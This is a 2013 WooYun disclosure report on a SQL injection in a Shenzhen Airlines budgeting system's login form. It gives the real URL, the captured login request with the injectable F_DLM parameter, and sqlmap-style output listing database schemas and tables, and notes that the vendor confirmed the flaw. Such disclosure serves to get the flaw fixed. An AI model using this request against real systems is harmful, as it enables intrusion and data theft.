当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040152

漏洞标题:深圳航空某系统SQL注射漏洞海量数据

相关厂商:深圳航空

漏洞作者: 小胖子

提交时间:2013-10-18 10:42

修复时间:2013-12-02 10:43

公开时间:2013-12-02 10:43

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-18: 细节已通知厂商并且等待厂商处理中
2013-10-18: 厂商已经确认,细节仅向厂商公开
2013-10-28: 细节向核心白帽子及相关领域专家公开
2013-11-07: 细节向普通白帽子公开
2013-11-17: 细节向实习白帽子公开
2013-12-02: 细节向公众公开

简要描述:

哇咔咔,ATM来了!

详细说明:

漏洞系统地址:全面预算应用平台 aspx+oracle

http://cw-info.shenzhenair.com/QMYS/Web/Login.aspx


登陆处没有做过滤,导致登陆框注入。
抓登陆包。

POST /QMYS/Web/LoginCheck.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://cw-info.shenzhenair.com/QMYS/Web/Login.aspx
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)
Host: cw-info.shenzhenair.com
Content-Length: 76
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=rivobj21bxefuf55b3q1em55; Seeyon_Q_Cookies=GUID_IP=fe2cab85-abf0-4c5b-b665-2742c5a8c42f
F_DLM=admin&F_MM=admin&statedatetime=Fri+Oct+18+10%3A26%3A13+UTC%2B0800+2013


F_DLM参数存在注入。

oracle.jpg


注入得到的数据库:

available databases [3]:
[*] CWYS2
[*] SYS
[*] SYSTEM
current schema (equivalent to database on Oracle): 'CWYS2'


当前数据库CWYS2的表有300多个,不读取了,你们速度修复吧。

[10:30:02] [INFO] the SQL query used returns 369 entries
[10:30:03] [INFO] retrieved: TB_ZX_SKDWXXB_20110112
[10:30:04] [INFO] retrieved: TB_ZX_BDMXB_20110112
[10:30:04] [INFO] retrieved: TB_ZX_BDZB_20110112
[10:30:06] [INFO] retrieved: XY_DEL_ZX_BDZB
[10:30:07] [INFO] retrieved: TB_ZX_YHFKDFPXX
[10:30:08] [INFO] retrieved: TMP_XX
[10:30:08] [INFO] retrieved: NS_STATS
[10:30:09] [INFO] retrieved: TB_XT_GNML_20101008
[10:30:10] [INFO] retrieved: TB_YS_YSNDTXB_20101008
[10:30:10] [INFO] retrieved: TB_YS_NDHZB_20130106
[10:30:11] [INFO] retrieved: TB_YS_YSBDMXB_20100628

漏洞证明:

见详细说明。

修复方案:

0x1:任何用户输入,都要过滤了。
0x2:求20rank

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-10-18 14:02

厂商回复:

感谢您对深航信息系统的关注和帮助,我们将尽快排查程序修补漏洞。

最新状态:

暂无